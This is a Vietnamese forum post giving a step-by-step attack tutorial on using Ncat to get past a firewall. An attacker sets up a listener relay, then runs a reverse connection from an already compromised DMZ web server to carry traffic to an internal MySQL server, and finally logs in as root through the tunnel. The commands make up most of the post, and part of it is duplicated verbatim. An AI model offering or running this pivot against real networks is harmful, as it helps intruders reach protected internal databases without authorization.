itprofes
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.

Vượt tường lửa bằng Ncat

Go down

Vượt tường lửa bằng Ncat Empty Vượt tường lửa bằng Ncat

Bài gửi  admin 15/5/2010, 2:34 pm

Vượt tường lửa bằng Ncat Diag-300x228
Trong hình trên, chúng ta có thể thấy web server đang nằm trong vùng DMZ còn database server thì được firewall bảo vệ, giả định web server đang chạy IIS mắc lỗi và ta có thể cài Ncat tại web server. Mục đích của cuộc tấn công là kết nối từ vị trí của Attack đến Database server.
Để kết nối tới Database server thì web server được xem là một điểm mấu chốt. Tất cả traffc mạng giữa database server và attacker sẽ được định tuyến thông qua điểm này. Để thực hiện tấn công, ta dùngNcat- phiên bản nâng cấp từ Netcat . Đã có nhiều tài liệu giúp khai thác Ncat một cách dễ dàng, nhưng trong bài viết này chúng tôi chỉ đưa ra các lệnh cơ bản phục vụ cho thực tế hiện có.


Trên hệ thống Attacker :

Bời vì Firewall chỉ cho phép các kết nối vào webserver thông qua cổng dịch vụ web (Web service) và không giới hạn các kết nối ngược từ webserver ra ngoài, nên chúng ta có thể lạm dụng web server thông qua Web service và lật ngược kết nối về máy attacker mà không bị Firewall ngăn chặn. Chúng ta sẽ thiết lập một Listener Ncat, tuy nhiên, chúng ta sẽ tạo ra một listener-to-listener, từ đó ta có thể thiết lập kết nôi từ port 3306 nhưng thực chất khi đến Firewall vẫn là 1337 ( trên 1 số webserver, port 1337 được dùng cho các ứng dụng web phụ trội)

Code:
ncat -l 1337 -c "ncat -l 3306"
    -l 1337: nghe TCP trên cổng 1337
    -c "ncat -l 3306": chuyển tất cả dữ liệu được nhận và gửi của 3306 về cồng 1337

Trên web server

Dùng Ncat tạo một client-to-client thiết lập kết nối giữa listener ta vừa tạo ở bước trước hướng tới Database server. Kết nối này sẽ mang tất cả dữ liệu giữa Attacker và database server

Code:
ncat 10.1.1.1 1337 -e "ncat 10.3.1.1 3306"
    -e "ncat 10.3.1.1 3306" : thực thi câu lệnh "ncat 10.3.1.1 3306" (lưu ý trên máy attacker dùng -c do hệ thống của attacker là linux)

- phiên bản nâng cấp từ Netcat . Đã có nhiều tài liệu giúp khai thác Ncat một cách dễ dàng, nhưng trong bài viết này chúng tôi chỉ đưa ra các lệnh cơ bản phục vụ cho thực tế hiện có.


Trên hệ thống Attacker :

Bời vì Firewall chỉ cho phép các kết nối vào webserver thông qua cổng dịch vụ web (Web service) và không giới hạn các kết nối ngược từ webserver ra ngoài, nên chúng ta có thể lạm dụng web server thông qua Web service và lật ngược kết nối về máy attacker mà không bị Firewall ngăn chặn. Chúng ta sẽ thiết lập một Listener Ncat, tuy nhiên, chúng ta sẽ tạo ra một listener-to-listener, từ đó ta có thể thiết lập kết nôi từ port 3306 nhưng thực chất khi đến Firewall vẫn là 1337 ( trên 1 số webserver, port 1337 được dùng cho các ứng dụng web phụ trội)

ncat -l 1337 -c "ncat -l 3306"
-l 1337: nghe TCP trên cổng 1337
-c "ncat -l 3306": chuyển tất cả dữ liệu được nhận và gửi của 3306 về cồng 1337

Trên web server

Dùng Ncat tạo một client-to-client thiết lập kết nối giữa listener ta vừa tạo ở bước trước hướng tới Database server. Kết nối này sẽ mang tất cả dữ liệu giữa Attacker và database server

ncat 10.1.1.1 1337 -e "ncat 10.3.1.1 3306"
-e "ncat 10.3.1.1 3306" : thực thi câu lệnh "ncat 10.3.1.1 3306" (lưu ý trên máy attacker dùng -c do hệ thống của attacker là linux)

Trên hệ thông Attacker

Bây giờ đường kết nối đã được thiết lập tất cả những việc còn lại chỉ là kết nối thông qua listener 3306 trên Attacker.

Trên hệ thông Attacker

Bây giờ đường kết nối đã được thiết lập tất cả những việc còn lại chỉ là kết nối thông qua listener 3306 trên Attacker.


Code:
 mysql -h 127.0.0.1 -u root -p
câu lệnh này sẽ được chuyển để database server thông qua Web server !
admin
admin
Thiếu Úy III
Thiếu Úy III

Tổng số bài gửi : 627
Diem : 6517
Thank : 4
Join date : 24/03/2010
Đến từ : Bỉm Sơn - Thanh hóa

https://itprofes.forumvi.com

Về Đầu Trang Go down

Về Đầu Trang

- Similar topics

 
Permissions in this forum:
Bạn không có quyền trả lời bài viết